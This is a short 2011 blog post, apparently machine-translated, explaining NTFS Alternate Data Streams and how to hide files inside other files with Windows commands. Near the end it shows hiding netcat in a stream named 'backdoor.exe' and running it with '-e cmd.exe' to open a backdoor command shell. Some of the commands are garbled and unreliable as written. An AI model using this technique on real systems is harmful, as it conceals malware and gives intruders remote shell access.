Pages

Subscribe:

December 9, 2011

ALTERNATE DATA STREAMS, or how to hide a file inside another file

We start talking about what is and how it works. Essentially, the "Alternate Data Streams" (ADS) are files within another file. You can think of a file as an ordered sequence of bytes accessed by a name. In NTFS System (New Technology File System) this is the data stream that comes from opening the file normally. However, NTFS has the ability to save alternative flows next to the main data by specifying a name for themselves.
Now let's do a simple test. To begin, go to command prompt and run the following commands:

Echo text1> file.txt
Echo text2> final.txt
(Create 2 files with the given text)

Type final.txt> file.txt: final.txt
(The file file.txt contains the file final.txt)

More <file.txt: final.txt
(We see the contents of final.txt)


In another example we shall run executable files:

Type notepad.exe> file.txt: notes.exe
Start. / File.txt: notes.exe
(With these commands execute it)

And if we take imagination, we can use other programs and for other uses:

Type nc.exe> file.txt: backdoor.exe
Start. / File.txt: backdoor.exe-d-L-p800-t-e cmd.exe
In the latter instance, run netcat program (discussed below) and several of its parameters, to create a back-door, and enter through this door to open a command window.
Finally, indicate that in recent versions of Windows does not work execution, but the way to hide the files. You can also enter a file to a directory, as it not only works with other files.

0 comentarios:

Post a Comment